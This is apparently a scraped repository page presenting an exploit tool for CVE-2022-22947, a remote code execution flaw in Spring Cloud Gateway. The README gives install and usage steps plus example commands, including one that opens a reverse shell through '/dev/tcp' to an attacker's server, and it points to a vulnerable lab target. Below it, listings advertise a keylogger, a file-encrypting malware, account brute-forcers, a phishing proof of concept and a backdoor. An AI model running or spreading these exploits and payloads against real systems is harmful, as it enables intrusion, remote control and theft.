spring-cloud-gateway-rce CVE-2022-22947

Related tags

Security related resourcesspring-cloud-gateway-rce
Overview

Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947)

1.installation

pip3 install -r requirements.txt

2.Usage

$ python3 spring-cloud-gateway-rce.py -h

   ___             __         ____    ___   ____   ____          ____   ____    ___   _  _    _____
  / __\ /\   /\   /__\       |___ \  / _ \ |___ \ |___ \        |___ \ |___ \  / _ \ | || |  |___  |
 / /    \ \ / /  /_\   _____   __) || | | |  __) |  __) | _____   __) |  __) || (_) || || |_    / /
/ /___   \ V /  //__  |_____| / __/ | |_| | / __/  / __/ |_____| / __/  / __/  \__, ||__   _|  / /
\____/    \_/   \__/         |_____| \___/ |_____||_____|       |_____||_____|   /_/    |_|   /_/


                                        CVE-2022-22947 Spring Cloud Gateway RCE
                                                                  By:K3rwin
usage: spring-cloud-gateway-rce.py [-h] [-u URL] [-c CMD] [-s SYSTEM]

Spring Cloud Gateway RCE 帮助指南

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     指定url
  -c CMD, --cmd CMD     指定执行的命令,默认执行whoami
  -s SYSTEM, --system SYSTEM
                        指定目标主机操作系统,默认linux,参数为win/linux

3.example

① -u 探测漏洞

python3 spring-cloud-gateway-rce.py -u "http://192.168.50.111:8080/"

image-20220313174120379

② -c 指定执行命令

python3 spring-cloud-gateway-rce.py -u "http://192.168.50.111:8080/" -c "ip add"

image-20220313174205428

③ 反弹shell

python3 spring-cloud-gateway-rce.py -u "http://192.168.50.111:8080/" -c "bash -i >& /dev/tcp/vps/6666 0>&1"

image-20220313175050373

docker靶场

vulfocus

image-20220313175230109

Owner
k3rwin
Hello World
k3rwin
GitHub Repository
Abusing Microsoft 365 OAuth Authorization Flow for Phishing Attack

O365DevicePhish Microsoft365_devicePhish Abusing Microsoft 365 OAuth Authorization Flow for Phishing Attack This is a simple proof-of-concept script t

Trewis [work] Scotch 4 Sep 23, 2022
Bilgi Sistemleri Projesi için yapılan keylogger

Keylogger Bilgi Sistemleri Projesi için yapılan keylogger Projede kullanılan kütüphanelere sahip olmasanız da python dosyası çalıştığında kendisi gere

Tarik Bulut 1 Jan 07, 2022
Let's you scan the entire internet in a couple of hours and identify all Minecraft servers on IPV4

Minecraft-Server-Scanner Let's you scan the entire internet in a couple of hours and identify all Minecraft servers on IPV4 Installation and running i

116 Jan 08, 2023
Log4j minecraft with python

Apache-Log4j Apache Log4j 远程代码执行 攻击者可直接构造恶意请求,触发远程代码执行漏洞。漏洞利用无需特殊配置,经阿里云安全团队验证,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响 Steps 【Import

manmade 57 Oct 03, 2022
A tool to brute force a gmail account. Use this tool to crack multiple accounts

A tool to brute force a gmail account. Use this tool to crack multiple accounts. This tool is developed to crack multiple accounts

Saad 12 Dec 30, 2022
A malware to encrypt all the .txt and .jpg files in target computer using RSA algorithms

A malware to encrypt all the .txt and .jpg files in target computer using RSA algorithms. Change the Blackgound image of targets' computer. and decrypt the targets' encrypted files in our own compute

Li Ka Lok 2 Dec 02, 2022
High level cheatsheet that was designed to make checks on the OSCP more manageable

High level cheatsheet that was designed to make checks on the OSCP more manageable. This repository however could also be used for your own studying or for evaluating test systems like on HackTheBox

Jacob Scheetz 89 Jan 01, 2023
Cloud One Container Security Runtime Events Forwarder

Example on how to query events by a RESTful API, compose CEF event format and send the events to an UDP receiver.

Markus Winkler 3 Feb 10, 2022
Get important strings inside [Info.plist] & and Binary file also all output of result it will be saved in [app_binary].json , [app_plist_file].json file

Get important strings inside [Info.plist] & and Binary file also all output of result it will be saved in [app_binary].json , [app_plist_file].json file

12 Sep 28, 2022
BoobSnail allows generating Excel 4.0 XLM macro. Its purpose is to support the RedTeam and BlueTeam in XLM macro generation.

Follow us on Twitter! BoobSnail BoobSnail allows generating XLM (Excel 4.0) macro. Its purpose is to support the RedTeam and BlueTeam in XLM macro gen

STM Cyber 232 Nov 21, 2022
Just your basic port scanner - with multiprocessing capabilities & further nmap enumeration.

Just-Your-Basic-Port-Scanner Just your basic port scanner - with multiprocessing capabilities & further nmap enumeration. Use at your own discretion,

Edward Zhou 0 Nov 06, 2021
CVE-2021-44228 log4j 2.x rce漏洞检测工具

#1 使用说明 CVE-2021-44228 log4j 2.x rce漏洞检测工具,对目标链接发起get请求并利用dnslog探测是否有回显 $ python3 log4j-scan.py -h

CoCo ainrm- 4 Jan 13, 2022
A tool to crack a wifi password with a help of wordlist

A tool to crack a wifi password with a help of wordlist. This may take long to crack a wifi depending upon number of passwords your wordlist contains. Also it is slower as compared to social media ac

Saad 144 Dec 29, 2022
A TCP Backdoor made in python

Tracey-Backdoor A Reverse Shell Backdoor made in python OOP. It supposed to work in Windows and Linux OS Functions: Reverse Connection Send Reverse TC

13 Oct 15, 2022
CVE-2021-43936 is a critical vulnerability (CVSS3 10.0) leading to Remote Code Execution (RCE) in WebHMI Firmware.

CVE-2021-43936 CVE-2021-43936 is a critical vulnerability (CVSS3 10.0) leading to Remote Code Execution (RCE) in WebHMI Firmware. This vulnerability w

Jeremiasz Pluta 8 Jul 05, 2022
😭 WSOB is a python tool created to exploit the new vulnerability on WSO2 assigned as CVE-2022-29464.

😭 WSOB (CVE-2022-29464) 😭 WSOB is a python tool created to exploit the new vulnerability on WSO2 assigned as CVE-2022-29464. CVE-2022-29464 details:

0p 25 Oct 14, 2022
Security tool to test different bypass of forbidden

notForbidden Security tool to test different bypass of forbidden Usage python3 notForbidden.py URL Features Bypass with different methods (POST, OPT

6 Sep 08, 2022
A tool for making python source difficult to read.

obscurepy Description A tool for obscuring, or making python source code difficult to read. Table of Contents Installation Limitations Usage Disclaime

Andrew Christiansen 10 Jul 31, 2022
Python HDFS client

Python HDFS client Because the world needs yet another way to talk to HDFS from Python. Usage This library provides a Python client for WebHDFS. NameN

Jing Wang 82 Dec 28, 2022
A simple Burp Suite extension to extract datas from source code

DataExtractor A simple Burp Suite extension to extract datas from source code. Features in scope parsing file extensions to ignore files exclusion bas

Gwendal Le Coguic 86 Dec 31, 2022